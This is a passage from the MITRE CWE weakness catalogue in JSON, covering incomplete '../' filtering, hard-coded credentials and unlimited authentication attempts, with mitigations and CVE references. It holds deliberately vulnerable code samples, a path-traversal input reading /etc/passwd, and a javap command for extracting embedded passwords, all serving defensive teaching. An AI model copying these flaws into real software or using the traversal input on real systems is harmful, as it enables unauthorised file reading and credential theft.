Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"796":{"attr":{"@_ID":"796","@_Name":"Only Filtering Special Elements Relative to a Marker","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. \\"at the beginning/end of a string; the second argument\\"), thereby missing remaining special elements that may exist before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"795","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-3"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter a \\"../\\" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/^\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression is only looking for an instance of \\"../\\" at the beginning of the string, it only removes the first \\"../\\" element. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"797":{"attr":{"@_ID":"797","@_Name":"Only Filtering Special Elements at an Absolute Position","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. \\"byte number 10\\"), thereby missing remaining special elements that may exist before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"795","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-4"},"Intro_Text":"The following code takes untrusted input and uses a substring function to filter a 3-character \\"../\\" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq \'../\') {}my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""],"xhtml:div":{"#text":"$Username = substr($Username, 3);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the if function is only looking for a substring of \\"../\\" between the 0 and 2 position, it only removes that specific \\"../\\" element. So an input value such as:","will have the first \\"../\\" filtered, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"798":{"attr":{"@_ID":"798","@_Name":"Use of Hard-coded Credentials","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.","Extended_Description":{"xhtml:p":["Hard-coded credentials typically create a significant hole that allows an attacker to bypass the authentication that has been configured by the software administrator. This hole might be difficult for the system administrator to detect. Even if detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations:","In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place.","The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Inbound: the software contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials.","Outbound: the software connects to another system or component, and it contains hard-coded credentials for connecting to that component."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"671","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"257","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If hard-coded passwords are used, it is almost certain that malicious users will gain access to the account in question."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Read Application Data","Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Other"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"Credential storage in configuration files is findable using black box methods, but the use of hard-coded credentials for an incoming authentication routine typically involves an account that is not visible outside of the code.","Effectiveness":"Moderate"},{"Method":"Automated Static Analysis","Description":"Automated white box techniques have been published for detecting hard-coded credentials for incoming authentication, but there is some expert disagreement regarding their effectiveness and applicability to a broad range of methods."},{"Method":"Manual Static Analysis","Description":"This weakness may be detectable using manual code analysis. Unless authentication is decentralized and applied throughout the software, there can be sufficient time for the analyst to find incoming authentication routines and examine the program logic looking for usage of hard-coded credentials. Configuration files could also be analyzed.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Dynamic Analysis","Description":{"xhtml:p":["For hard-coded credentials in incoming authentication: use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Using call trees or similar artifacts from the output, examine the associated behaviors and see if any of them appear to be comparing the input to a fixed string or value."]}},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Network Sniffer","Forced Path Execution"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].","In Windows environments, the Encrypted File System (EFS) may provide some protection."]}},{"Phase":"Architecture and Design","Description":"For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a \\"first login\\" mode that requires the user to enter a unique strong password or key."},{"Phase":"Architecture and Design","Description":"If the software must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.","Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"For front-end to back-end connections: Three solutions are possible, although none are complete.","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.","Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.","Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks."]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-13"},"Intro_Text":"The following code uses a hard-coded password to connect to a database:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...DriverManager.getConnection(url, \\"scott\\", \\"tiger\\");...","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"javap -c ConnMngr.class","xhtml:div":{"#text":"22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user \\"scott\\" with a password of \\"tiger\\" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above:"},{"attr":{"@_Demonstrative_Example_ID":"DX-14"},"Intro_Text":"The following code is an example of an internal hard-coded password in the back-end:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password, \\"Mew!\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0)","xhtml:br":""}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (!password.equals(\\"Mew!\\")) {}//Diagnostic Modereturn(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0)","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}}],"Body_Text":"Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this \\"functionality.\\""},{"attr":{"@_Demonstrative_Example_ID":"DX-92"},"Intro_Text":"The following code examples attempt to verify a password using a hard-coded cryptographic key.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password,\\"68af404b513073584c4b6f22b6c63e6b\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","xhtml:br":["",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean VerifyAdmin(String password) {","xhtml:div":{"#text":"if (password.equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}System.out.println(\\"Incorrect Password!\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Entering Diagnostic Mode...\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (password.Equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}Console.WriteLine(\\"Incorrect Password!\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Entering Diagnostic Mode...\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2772","Description":"SCADA system uses a hard-coded password to protect back-end database containing authorization information, exploited by Stuxnet worm","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772"},{"Reference":"CVE-2010-2073","Description":"FTP server library uses hard-coded usernames and passwords for three default accounts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073"},{"Reference":"CVE-2010-1573","Description":"Chain: Router firmware uses hard-coded username and password for access to debug functionality, which can be used to execute arbitrary code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1573"},{"Reference":"CVE-2008-2369","Description":"Server uses hard-coded authentication key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2369"},{"Reference":"CVE-2008-0961","Description":"Backup product uses hard-coded username and password, allowing attackers to bypass authentication via the RPC interface","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0961"},{"Reference":"CVE-2008-1160","Description":"Security appliance uses hard-coded password allowing attackers to gain root access","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1160"},{"Reference":"CVE-2006-7142","Description":"Drive encryption product stores hard-coded cryptographic keys for encrypted configuration files in executable programs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142"},{"Reference":"CVE-2005-3716","Description":"VoIP product uses unchangeable hard-coded public credentials that cannot be changed, which allows attackers to obtain sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3716"},{"Reference":"CVE-2005-3803","Description":"VoIP product uses hard coded public and private SNMP community strings that cannot be changed, which allows remote attackers to obtain sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3803"},{"Reference":"CVE-2005-0496","Description":"Backup product contains hard-coded credentials that effectively serve as a back door, which allows remote attackers to access the file system","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0496"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC03-J","Entry_Name":"Never hard code sensitive information"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-798"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"191"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, "Key Management Issues" Page 272"}},{"attr":{"@_External_Reference_ID":"REF-729"}},{"attr":{"@_External_Reference_ID":"REF-172"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-798"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"More abstract entry for hard-coded password and hard-coded cryptographic key."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"799":{"attr":{"@_ID":"799","@_Name":"Improper Control of Interaction Frequency","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.","Extended_Description":"This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Insufficient anti-automation","Description":"The term \\"insufficient anti-automation\\" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader."},{"Term":"Brute force","Description":"Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control","Other"],"Impact":["DoS: Resource Consumption (Other)","Bypass Protection Mechanism","Other"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char username[USERNAME_SIZE];char password[PASSWORD_SIZE];while (isValidUser == 0) {}return(SUCCESS);","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {}","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int count = 0;while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) {}if (isValidUser) {}else {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {}count++;","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":""}},{"#text":"return(SUCCESS);","attr":{"@_style":"margin-left:10px;"}},{"#text":"return(FAIL);","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1876","Description":"Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1876"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":21,"Entry_Name":"Insufficient 